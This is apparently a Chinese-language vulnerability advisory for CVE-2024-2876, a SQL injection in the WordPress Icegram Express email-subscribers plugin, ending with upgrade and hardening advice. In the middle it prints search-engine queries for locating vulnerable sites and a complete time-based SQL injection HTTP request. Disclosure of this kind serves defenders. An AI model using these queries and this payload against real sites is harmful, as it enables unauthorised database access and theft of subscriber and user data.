CVE-2024-2876 是在 WordPress 的 "Email Subscribers by Icegram Express" 插件中发现的一个严重安全漏洞。该漏洞影响 5.7.14 及更早版本,对超过 90,000 个网站构成重大风险。
该漏洞是一个 SQL 注入缺陷,允许未经身份验证的攻击者在受影响的 WordPress 数据库上执行恶意 SQL 查询。通过操纵未经正确清理的用户输入,攻击者可以提取敏感信息,如用户名、电子邮件地址、密码哈希和订阅者列表。
SQL 注入发生在插件 IG_ES_Subscribers_Query 类的 run 函数中,输入验证不足导致未经授权的 SQL 代码执行。这破坏了存储在 WordPress 数据库中数据的完整性和机密性。
FOFA:body="/wp-content/plugins/email-subscribers/"
publicwww:"/wp-content/plugins/email-subscribers/"
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
立即更新:如果您正在使用 "Email Subscribers by Icegram Express" 插件,请立即升级到 5.7.15 或更高版本以应用安全修复。
定期审计:定期检查并将所有 WordPress 插件和主题更新到最新版本,以确保安全性。
安全插件:使用信誉良好的 WordPress 安全插件来增强对 SQL 注入和其他网络威胁的防御能力。
强密码策略:为与您的 WordPress 网站相关的所有账户实施强且唯一的密码,以降低未经授权访问的风险。
未能更新受影响的插件可能使网站面临数据泄露和未经授权访问的风险。鉴于该插件的广泛使用,立即采取行动对于保护安装至关重要。